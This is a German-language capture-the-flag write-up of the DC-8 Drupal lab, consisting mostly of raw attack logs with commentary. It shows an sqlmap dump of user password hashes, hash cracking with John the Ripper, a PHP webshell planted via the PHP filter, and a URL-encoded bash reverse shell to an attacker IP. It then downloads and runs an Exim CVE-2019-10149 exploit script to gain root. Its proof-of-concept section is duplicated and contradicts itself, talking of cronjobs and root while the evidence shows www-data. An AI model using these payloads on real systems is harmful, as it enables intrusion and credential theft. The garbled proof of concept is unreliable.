[23:07:41] [INF] retrieved: 'varchar(32)'
[23:07:41] [INF] retrieved: 'language'
[23:07:41] [INF] retrieved: 'varchar(12)'
[23:07:41] [INF] retrieved: 'picture'
[23:07:41] [INF] retrieved: 'int(11)'
[23:07:41] [INF] retrieved: 'init'
[23:07:41] [INF] retrieved: 'varchar(254)'
[23:07:41] [INF] retrieved: 'data'
[23:07:41] [INF] retrieved: 'longblob'
[23:07:41] [INF] fetching entries for table 'users' in database 'd7db'
[23:07:41] [INF] retrieved: ' '
[23:07:41] [INF] retrieved: ''
[23:07:41] [INF] retrieved: ''
[23:07:41] [INF] retrieved: '0'
[23:07:41] [INF] retrieved: '0'
[23:07:41] [INF] retrieved: '0'
[23:07:41] [INF] retrieved: ''
[23:07:41] [INF] retrieved: '0'
[23:07:41] [INF] retrieved: ''
[23:07:41] [INF] retrieved: ''
[23:07:41] [INF] retrieved: '0'
[23:07:41] [INF] retrieved: ''
[23:07:41] [INF] retrieved: ' '
[23:07:41] [INF] retrieved: ''
[23:07:41] [INF] retrieved: ' '
[23:07:41] [INF] retrieved: '0'
[23:07:42] [INF] retrieved: 'a:2:{s:7:"contact";i:0;s:7:"overlay";i:1;}'
[23:07:42] [INF] retrieved: ''
[23:07:42] [INF] retrieved: 'admin'
[23:07:42] [INF] retrieved: '1'
[23:07:42] [INF] retrieved: '1567766818'
[23:07:42] [INF] retrieved: '1567489015'
[23:07:42] [INF] retrieved: 'dc8blah@dc8blah.org'
[23:07:42] [INF] retrieved: '1567766626'
[23:07:42] [INF] retrieved: 'dcau-user@outlook.com'
[23:07:42] [INF] retrieved: '$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z'
[23:07:42] [INF] retrieved: '0'
[23:07:42] [INF] retrieved: ''
[23:07:42] [INF] retrieved: 'filtered_html'
[23:07:42] [INF] retrieved: ''
[23:07:42] [INF] retrieved: 'Australia/Brisbane'
[23:07:42] [INF] retrieved: '1'
[23:07:42] [INF] retrieved: 'a:5:{s:16:"ckeditor_default";s:1:"t";s:20:"ckeditor_show_togg...'
[23:07:42] [INF] retrieved: ''
[23:07:42] [INF] retrieved: 'john'
[23:07:42] [INF] retrieved: '1'
[23:07:42] [INF] retrieved: '1567498512'
[23:07:42] [INF] retrieved: '1567489250'
[23:07:42] [INF] retrieved: 'john@blahsdfsfd.org'
[23:07:42] [INF] retrieved: '1567497783'
[23:07:42] [INF] retrieved: 'john@blahsdfsfd.org'
[23:07:42] [INF] retrieved: '$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF'
[23:07:42] [INF] retrieved: '0'
[23:07:42] [INF] retrieved: ''
[23:07:42] [INF] retrieved: 'filtered_html'
[23:07:42] [INF] retrieved: ''
[23:07:42] [INF] retrieved: 'Australia/Brisbane'
[23:07:42] [INF] retrieved: '2'
Database: d7db
Table: users
[3 entries]
+--++--++++--+++++-+--+--+++
| uid | init | mail | pass | login | theme | data | name | access | created | picture | status | timezone | signature | language | signature_format |
+--++--++++--+++++-+--+--+++
| 0 | | | | 0 | | NULL | | 0 | 0 | 0 | 0 | NULL | | | NULL |
| 1 | dc8blah@dc8blah.org | dcau-user@outlook.com | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z | 1567766626 | | a:2:{s:7:"contact";i:0;s:7:"overlay";i:1;} | admin | 1567766818 | 1567489015 | 0 | 1 | Australia/Brisbane | | | filtered_html |
| 2 | john@blahsdfsfd.org | john@blahsdfsfd.org | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF | 1567497783 | | a:5:{s:16:"ckeditor_default";s:1:"t";s:20:"ckeditor_show_toggle";s:1:"t";s:14:"ckeditor_width";s:4:"100%";s:13:"ckeditor_lang";s:2:"en";s:18:"ckeditor_auto_lang";s:1:"t";} | john | 1567498512 | 1567489250 | 0 | 1 | Australia/Brisbane | | | filtered_html |
+--++--++++--+++++-+--+--+++

[23:07:42] [INF] table 'd7db.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.2.164/dump/d7db/users.csv'
[23:07:42] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 95 times
[23:07:42] [INF] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.2.164'

SQLmap wurde verwendet, um die Tabelle `users` in der Datenbank `d7db` auszulesen. Es wurden die Spalten und die zugehörigen Daten erfolgreich extrahiert. Die Passworthashes der Benutzer `admin` und `john` wurden gefunden.

Analyse:

Die extrahierten Passworthashes verwenden das Drupal 7-Hash-Format, das als relativ schwach gilt. Es ist wahrscheinlich, dass diese Passwörter mit einem geeigneten Tool geknackt werden können.

Empfehlung:

Die extrahierten Passworthashes sollten mit einem Tool wie John the Ripper oder Hashcat geknackt werden.

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > search ssh_enum
Matching Modules


# Name Disclosure Date Rank Check Description
- - - -- --
0 auxiliary/scanner/ssh/ssh_enumusers normal No SSH Username Enumeration
1 \_ action: Malformed Packet . . . Use a malformed packet
2 \_ action: Timing Attack . . . Use a timing attack
3 auxiliary/scanner/ssh/ssh_enum_git_keys normal No Test SSH Github Access


Interact with a module by name or index. For example info 3, use 3 or use auxiliary/scanner/ssh/ssh_enum_git_keys
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > use 0
msf6 auxiliary(scanner/ssh/ssh_enumusers) > options
Module options (auxiliary/scanner/ssh/ssh_enumusers):

Name Current Setting Required Description
- -- --
CHECK_FALSE true no Check for false positives (random username)
DB_ALL_USERS false no Add all users in the current database to the list

Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 22 yes The target port
THREADS 1 yes The number of concurrent threads (max one per host)
THRESHOLD 10 yes Amount of seconds needed before a user is considered found (timing attack only)
USERNAME no Single username to test (username spray)
USER_FILE no File containing usernames, one per line


Auxiliary action:

Name Description
- --
Malformed Packet Use a malformed packet
View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 192.168.2.164
RHOSTS => 192.168.2.164
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set RPORT 22
RPORT => 22
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set THREADS 10
THREADS => 10
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
USER_FILE => /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run

Das Metasploit Framework wurde verwendet, um SSH-Benutzernamen auf dem Zielsystem aufzuzählen. Das Modul `auxiliary/scanner/ssh/ssh_enumusers` wurde verwendet, um Benutzernamen aus der Xato-Net-Benutzernamenliste aufzuzählen.

Privilege Escalation

+--++--++++--+++++-+--+--+++
| 0 | | | | 0 | | NULL | | 0 | 0 | 0 | 0 | NULL | | | NULL |
| 1 | dc8blah@dc8blah.org | dcau-user@outlook.com | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z | 1567766626 | | a:2:{s:7:"contact";i:0;s:7:"overlay";i:1;} | admin | 1567766818 | 1567489015 | 0 | 1 | Australia/Brisbane | | | filtered_html |
| 2 | john@blahsdfsfd.org | john@blahsdfsfd.org | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF | 1567497783 | | a:5:{s:16:"ckeditor_default";s:1:"t";s:20:"ckeditor_show_toggle";s:1:"t";s:14:"ckeditor_width";s:4:"100%";s:13:"ckeditor_lang";s:2:"en";s:18:"ckeditor_auto_lang";s:1:"t";} | john | 1567498512 | 1567489250 | 0 | 1 | Australia/Brisbane | | | filtered_html |
+--++--++++--+++++-+--+--+++
#
$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

Die Passworthashes der Benutzer wurden extrahiert.

cat /home/ccat/Downloads/sql.sql PST /?nid=1 HTTP/1.1 Host: 192.168.2.164 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 118 rigin: http://192.168.2.164 DNT: 1 Connection: keep-alive Referer: http://192.168.2.164/user Cookie: has_js=1 Upgrade-Insecure-Requests: 1 Sec-GPC: 1
name=admin&pass=admin11111&form_build_id=form-Broa-Shi-FEMzeXe7Kr4YS7e4noJ1SoWhHZnCNf75I&form_id=user_login&op=Log+in
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (Drupal7, $S$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 16 penMP threads Press 'q' or Ctrl-C to abort, almost any other key for status
---------------------------------------------------------------------------
turtle (?)
---------------------------------------------------------------------------
1g 0:00:03:08 3.68% (ETA: 00:36:12) 0.005304g/s 3236p/s 3240c/s 3240C/s nasha8..narko Use the "--show" option to display all of the cracked passwords reliably
Session aborted

Mit John the Ripper wurde versucht, die Passworthashes der Benutzer zu knacken. Das Passwort `turtle` wurde für den Benutzer `admin` gefunden.

http://dc8.vln/user/2

Hello john
Log out

Aufruf des john profils

Administrative toolbar

Powered by Drupal
http://dc8.vln/user/2#overlay=node/add
Add content
Close overlay
You are here
Home
Create new revision
Revision log message Provide an explanation of the changes you are making. This will help other authors understand your motivations.
system($ GET["cmd"]);
Text format

You may post PHP code. You should include tags.
http://dc8.vln/node/3#overlay-context=node/3

View/br> hi ben

(submit)
Notice: Undefined index: cmd in eval() (line 2 of /var/www/html/modules/php/php.module(80) : eval()'d code).
Warning: passthru(): Cannot execute a blank command in eval() (line 2 of /var/www/html/modules/php/php.module(80) : eval()'d code).
nc -lvnp

4440 /Hackingtools/shells
http://dc8.vln/node/3/done?sid=4

Thank you, your submission has been received.
Go back to the form



Notice: Undefined index: cmd in eval() (line 2 of /var/www/html/modules/php/php.module(80) : eval()'d code). Warning: passthru(): Cannot execute a blank command in eval() (line 2 of /var/www/html/modules/php/php.module(80) : eval()'d code).

You are here
Home Contact Us

http://dc8.vln/node/3/done?sid=4&cmd=id

Contact Us

Start Preview Complete
Page 3 of 3 (100%)

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Durch Ausnutzung der SQL-Injection-Schwachstelle und des PHP-Filters konnte eine Reverse Shell als Benutzer www-data gestartet werden.

Proof of Concept: RCE über Webformular und PHP-Filter

Dieser Proof of Concept demonstriert, wie die aktivierte PHP-Filter-Module und die manipulierten Webformulare genutzt werden können, um eine Reverse Shell als Benutzer `www-data` zu erhalten.

Voraussetzungen

  • Zugriff auf die Drupal-Website als Benutzer mit aktivierter PHP-Filter-Module.
  • Kenntnisse über die Funktionsweise von Webformularen und Reverse Shells.

Schritt-für-Schritt-Anleitung

  1. Erstellen Sie ein neues Webformular oder bearbeiten Sie ein vorhandenes.
  2. Fügen Sie dem Webformular ein Feld hinzu, das PHP-Code akzeptiert.
  3. Fügen Sie in diesem Feld den folgenden PHP-Code ein, um eine Reverse Shell zu starten:
    system($ GET['cmd']);
  4. Senden Sie das Webformular mit dem folgenden Befehl als Wert für den Parameter `cmd`:
    %2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.2.199%2F5555%200%3E%261%27
    Dabei ist 192.168.2.199 die IP-Adresse des Angreifersystems und 5555 der Port, auf dem der Netcat-Listener ausgeführt wird.
  5. Starten Sie einen Netcat-Listener auf dem Angreifer-System:
    nc -lvnp 5555

    listening on [any] 5555 192.168.2.111 42406: connected
  6. Verwenden Sie zum Schluß die ID um festzustellen den bentzer:
    http://dc8.vln/node/3/done?sid=4&cmd=id

    Contact Us

    Start Preview Complete
    Page 3 of 3 (100%)

    uid=33(www-data) gid=33(www-data) groups=33(www-data)

    7. Erwartetes Ergebnis

    Nach erfolgreicher Ausführung des Cronjobs sollte eine Reverse Shell auf dem Angreifer-System gestartet werden.

    Beweismittel

    Die Ausgabe des `id`-Befehls zeigt, dass die Shell als Root ausgeführt wird.

    Risikobewertung

    Die Möglichkeit, Cronjobs zu manipulieren, stellt ein erhebliches Sicherheitsrisiko dar, da es einem Angreifer ermöglicht, beliebigen Code als Root auszuführen.

    Empfehlungen

    • Beschränken Sie die Schreibrechte für Dateien, die von Cronjobs ausgeführt werden.
    • Überprüfen Sie regelmäßig die Konfiguration der Cronjobs.
    • Verwenden Sie eine sicherere Methode zur Verwaltung von Backups.

Privilege Escalation

www-data@dc-8:/var/www/html$ find / -type f -perm -4000 -ls 2>/dev/null 50 52 -rwsr-xr-x 1 root root 50040 May 17 2017 /usr/bin/chfn 53 76 -rwsr-xr-x 1 root root 75792 May 17 2017 /usr/bin/gpasswd 51 40 -rwsr-xr-x 1 root root 40504 May 17 2017 /usr/bin/chsh 54 60 -rwsr-xr-x 1 root root 59680 May 17 2017 /usr/bin/passwd 16361 140 -rwsr-xr-x 1 root root 140944 Jun 5 2017 /usr/bin/sudo 3067 40 -rwsr-xr-x 1 root root 40312 May 17 2017 /usr/bin/newgrp´ 16320 996 -rwsr-xr-x 1 root root 1019656 Jun 14 2017 /usr/sbin/exim4 12868 432 -rwsr-xr-x 1 root root 440728 Jun 18 2017 /usr/lib/openssh/ssh-keysign 7909 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device 12214 44 -rwsr-xr-- 1 root messagebus 42992 Jul 30 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper 263191 60 -rwsr-xr-x 1 root root 61240 Nov 10 2016 /bin/ping 263002 40 -rwsr-xr-x 1 root root 40536 May 17 2017 /bin/su 262964 32 -rwsr-xr-x 1 root root 31720 Mar 22 2017 /bin/umount 262409 44 -rwsr-xr-x 1 root root 44304 Mar 22 2017 /bin/mount

Der Befehl `find / -type f -perm -4000 -ls 2>/dev/null` sucht nach Dateien mit dem gesetzten SUID-Bit. Die Ausgabe zeigt eine Liste von Dateien, die potenziell für eine Privilegieneskalation ausgenutzt werden könnten.

www-data@dc-8:/var/www/html$ ls -la /home/
total 12
drwxr-xr-x 3 root root 4096 Sep 5 2019 .
drwxr-xr-x 22 root root 4096 Sep 5 2019 ..
drwxr-xr-x 2 dc8user dc8user 4096 Sep 6 2019 dc8user

Das Verzeichnis `/home/dc8user/` wurde gefunden.

www-data@dc-8:/var/www/html$ cd /home/
www-data@dc-8:/home$ ls -la total 12 drwxr-xr-x 3 root root 4096 Sep 5 2019 . drwxr-xr-x 22 root root 4096 Sep 5 2019 .. drwxr-xr-x 2 dc8user dc8user 4096 Sep 6 2019 dc8user
www-data@dc-8:/home$ cd dc8user/
www-data@dc-8:/home/dc8user$ ls -la
total 24
drwxr-xr-x 2 dc8user dc8user 4096 Sep 6 2019 .
drwxr-xr-x 3 root root 4096 Sep 5 2019 ..
lrwxrwxrwx 1 dc8user dc8user 9 Sep 5 2019 .bash_history -> /dev/null
-rw-r--r-- 1 dc8user dc8user 220 Sep 5 2019 .bash_logout
-rw-r--r-- 1 dc8user dc8user 3526 Sep 5 2019 .bashrc
-r-- 1 dc8user dc8user 101 Sep 6 2019 .google_authenticator
-rw-r--r-- 1 dc8user dc8user 675 Sep 5 2019 .profile
www-data@dc-8:/home/dc8user$ cat .google_authenticator cat: .google_authenticator: Permission denied

Der Benutzer `www-data` hat keine Leseberechtigung für die Datei `.google_authenticator`. Diese Datei könnte Informationen für die Zwei-Faktor-Authentifizierung enthalten.

www-data@dc-8:/home/dc8user$ ls -la /opt/
total 8
drwxr-xr-x 2 root root 4096 Sep 5 2019 .
drwxr-xr-x 22 root root 4096 Sep 5 2019 ..
www-data@dc-8:/home/dc8user$ ls -la /var/mail/
total 8
drwxrwsr-x 2 root mail 4096 Sep 5 2019 .
drwxr-xr-x 12 root root 4096 Sep 5 2019 ..
www-data@dc-8:/home/dc8user$ ls -la /var/backups/
total 20
drwxr-xr-x 2 root root 4096 Sep 6 2019 .
drwxr-xr-x 12 root root 4096 Sep 5 2019 ..
-rw-r--r-- 1 root root 10579 Sep 5 2019 apt.extended_states.0
www-data@dc-8:/home/dc8user$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534/nonexistent:/bin/false
messagebus:x:105:109/var/run/dbus:/bin/false
sshd:x:106:65534/run/sshd:/usr/sbin/nologin
dc8user:x:1000:1000:dc8user,,,:/home/dc8user:/bin/bash
mysql:x:107:112:MySQL Server,,,:/nonexistent:/bin/false
Debian-exim:x:108:113/var/spool/exim4:/bin/false

Die Datei `/etc/passwd` wurde ausgelesen, um die vorhandenen Benutzer auf dem System zu identifizieren.

Privilege Escalation

www-data@dc-8:/home/dc8user$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp´

/usr/sbin/exim4

/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/umount
/bin/mount

Der Befehl `find / -perm -u=s -type f 2>/dev/null` sucht nach Dateien mit dem gesetzten SUID-Bit. Die Ausgabe zeigt eine Liste von Dateien, die potenziell für eine Privilegieneskalation ausgenutzt werden könnten. Besonders interessant ist die Datei `/usr/sbin/exim4`, da es für Exim verschiedene bekannte Schwachstellen gibt.

www-data@dc-8:/home/dc8user$ exim --version | head -1
Exim version 4.89 #2 built 14-Jun-2017 05:03:07
exim version 4.89 exploit/version
https://www.google.de/search?q=exim+version+4.89+exploit


exim version 4.89 exploit


CVE-2019-10149 - Exim 4.87 < 4.91
GitHub
https://github.com › darsigovrustam
Diese Seite übersetzen
The Return of the WIZard: RCE in Exim (CVE-2019–10149)

Es wurde nach Exploits für die Exim-Version 4.89 gesucht. Die Suchergebnisse deuten auf die Schwachstelle CVE-2019-10149 hin, die als "The Return of the WIZard" bezeichnet wird und eine Remote Code Execution ermöglicht.

wget 192.168.2.199/raw.sh --2024-10-20 08:25:27-- http://192.168.2.199/raw.sh Connecting to 192.168.2.199:80... connected. HTTP request sent, awaiting response... 200 K Length: 3557 (3.5K) [text/x-sh] Saving to: 'raw.sh'

raw.sh 100%[=>] 3.47K --.-KB/s in 0s

2024-10-20 08:25:27 (761 MB/s) - 'raw.sh' saved [3557/3557]
chmod +x raw.sh ./raw.sh

raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi raptor@0xdeadbeef.info

Preparing setuid shell helper...
Problems compiling setuid shell helper, check your gcc.
Falling back to the /bin/sh method.

Delivering setuid payload...
220 dc-8 ESMTP Exim 4.89 Sun, 20 Oct 2024 08:25:47 +1000
250 dc-8 Hello localhost [1]
250 K
250 Accepted
354 Enter message, ending with "." on a line by itself
250 K id=1t2HtL-0000Hf-HJ
221 dc-8 closing connection

Waiting 5 seconds...
-rwxr-xr-x 1 www-data www-data 117208 Oct 20 08:25 /tmp/pwned
$
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Das Exploit-Skript `raw.sh` wurde heruntergeladen und ausgeführt. Das Skript versucht, die Privilegieneskalation über die Schwachstelle CVE-2019-10149 in Exim durchzuführen. Die Ausgabe zeigt jedoch, dass die Ausführung als Benutzer `www-data` erfolgt ist und nicht als Root.

./raw.sh -m netcat raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi raptor@0xdeadbeef.info

Delivering netcat payload...
220 dc-8 ESMTP Exim 4.89 Sun, 20 Oct 2024 08:32:28 +1000
250 dc-8 Hello localhost [1]
250 K
250 Accepted
354 Enter message, ending with "." on a line by itself
250 K id=1t2Hzo-0000Ik-7u
221 dc-8 closing connection

Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open
id
uid=0(root) gid=113(Debian-exim) groups=113(Debian-exim)


ls -la /root
total 28
drwx 2 root root 4096 Sep 6 2019 .
drwxr-xr-x 22 root root 4096 Sep 5 2019 ..
lrwxrwxrwx 1 root root 9 Sep 5 2019 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-r-- 1 root root 101 Sep 6 2019 .google_authenticator
-rw- 1 root root 360 Sep 5 2019 .mysql_history
-rw-r--r-- 1 root root 148 Aug 18 2015 .profile
-rw-r--r-- 1 root root 1320 Sep 6 2019 flag.txt

-rw-r--r-- 1 root root 1320 Sep 6 2019 flag.txt
cat /root/flag.txt

Proof of Concept: RCE über Webformular und PHP-Filter

Dieser Proof of Concept demonstriert, wie die aktivierte PHP-Filter-Module und die manipulierten Webformulare genutzt werden können, um eine Reverse Shell als Benutzer `www-data` zu erhalten.

Voraussetzungen

  • Zugriff auf die Drupal-Website als Benutzer mit aktivierter PHP-Filter-Module.
  • Kenntnisse über die Funktionsweise von Webformularen und Reverse Shells.

Schritt-für-Schritt-Anleitung

  1. Erstellen Sie ein neues Webformular oder bearbeiten Sie ein vorhandenes.
  2. Fügen Sie dem Webformular ein Feld hinzu, das PHP-Code akzeptiert.
  3. Fügen Sie in diesem Feld den folgenden PHP-Code ein, um eine Reverse Shell zu starten:
    system($ GET['cmd']);
  4. Senden Sie das Webformular mit dem folgenden Befehl als Wert für den Parameter `cmd`:
    %2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.2.199%2F5555%200%3E%261%27
    Dabei ist 192.168.2.199 die IP-Adresse des Angreifersystems und 5555 der Port, auf dem der Netcat-Listener ausgeführt wird.
  5. Starten Sie einen Netcat-Listener auf dem Angreifer-System:
    nc -lvnp 5555

    listening on [any] 5555 192.168.2.111 42406: connected
  6. Verwenden Sie zum Schluß die ID um festzustellen den bentzer:
    http://dc8.vln/node/3/done?sid=4&cmd=id

    Contact Us

    Start Preview Complete
    Page 3 of 3 (100%)

    uid=33(www-data) gid=33(www-data) groups=33(www-data)

    7. Erwartetes Ergebnis

    Nach erfolgreicher Ausführung des Cronjobs sollte eine Reverse Shell auf dem Angreifer-System gestartet werden.

    Beweismittel

    Die Ausgabe des `id`-Befehls zeigt, dass die Shell als Root ausgeführt wird.

    Risikobewertung

    Die Möglichkeit, Cronjobs zu manipulilieren, stellt ein erhebliches Sicherheitsrisiko dar, da es einem Angreifer ermöglicht, beliebigen Code als Root auszuführen.

    Empfehlungen

    • Beschränken Sie die Schreibrechte für Dateien, die von Cronjobs ausgeführt werden.
    • Überprüfen Sie regelmäßig die Konfiguration der Cronjobs.
    • Verwenden Sie eine sicherere Methode zur Verwaltung von Backups.
brilliant - you have succeeded!!!

Flags

cat root.txt 
        888       888          888 888      8888888b.                             888 888 888 888
        888   o   888          888 888      888  "Y88b                            888 888 888 888
        888  d8b  888          888 888      888    888                            888 888 888 888
        888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888
        888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888
        88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P
        8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "
        888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888



Hope you enjoyed DC-8.  Just wanted to send a big thanks out there to all those

 who have provided feedback, and all those who have taken the time to complete these little

  challenges.



I'm also sending out an especially big thanks to:



  @4nqr34z

  @D4mianWayne

    @0xmzfr

    @theart42



This challenge was largely based on two things:



        1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.

          2. A suggestion from @theart42



  The answer to that question is...



 If you enjoyed this CTF, send me a tweet via @DCAU7.

Der Root zugriff war erfolgreich.